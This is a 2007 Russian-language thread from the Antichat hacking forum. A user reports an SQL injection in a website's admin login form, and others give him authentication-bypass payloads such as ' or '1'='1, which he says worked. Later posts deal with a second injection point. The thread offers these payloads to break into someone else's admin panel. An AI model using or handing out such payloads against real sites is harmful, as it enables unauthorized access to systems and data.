ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Вопрос по скуле!
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по скуле!
  #1  
Старый 18.08.2007, 00:22
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
Question Вопрос по скуле!
Нашел скулю в форме авторизации админа.
В форму ввожу login:admin pass:' , выдает :
Код:
SELECT AId FROM adm_admins WHERE ALogin='admin' AND APassword='''Ошибка выполнения запроса. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1. Выполнение прервано
Что посоветуете?
 
Ответить с цитированием

  #2  
Старый 18.08.2007, 00:36
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
blablabla' or 1=1/*
?:\
__________________
..
Последний раз редактировалось [sL1p]; 18.08.2007 в 00:40..
 
Ответить с цитированием

  #3  
Старый 18.08.2007, 00:42
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию
Цитата:
Сообщение от [sL1p]  
blablabla' or 1=1/*
?:\
blablabla' or '1'='1
мона вот так..
 
Ответить с цитированием

  #4  
Старый 18.08.2007, 00:57
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
Прошло вот так ' or '1'='1. Спасибо совсем забыл про or!
 
Ответить с цитированием

  #5  
Старый 18.08.2007, 01:02
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию
Цитата:
Сообщение от fly  
Прошло вот так ' or '1'='1. Спасибо совсем забыл про or!
Просто не всегда ясно, что там за ковычкой, по-этому сразу отсекать ее не стоит =\
 
Ответить с цитированием

  #6  
Старый 18.08.2007, 01:10
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''))' at line 1
А вот в другом месте вот так, но уже выше что написано было не проходит.
 
Ответить с цитированием

  #7  
Старый 18.08.2007, 01:31
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию
Цитата:
Сообщение от fly  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''))' at line 1
А вот в другом месте вот так, но уже выше что написано было не проходит.
а в каком параметре или контексте?
скорее всего надо скобки еще просовывать закрывающие и открывающие(либо отсекать реальные закрывающие)..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
ВОПРОС ЗНАТОКАМ Hrust Болталка 12 23.01.2005 19:31
Вопрос по брутфорсу _at_ Чаты 0 21.12.2004 19:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ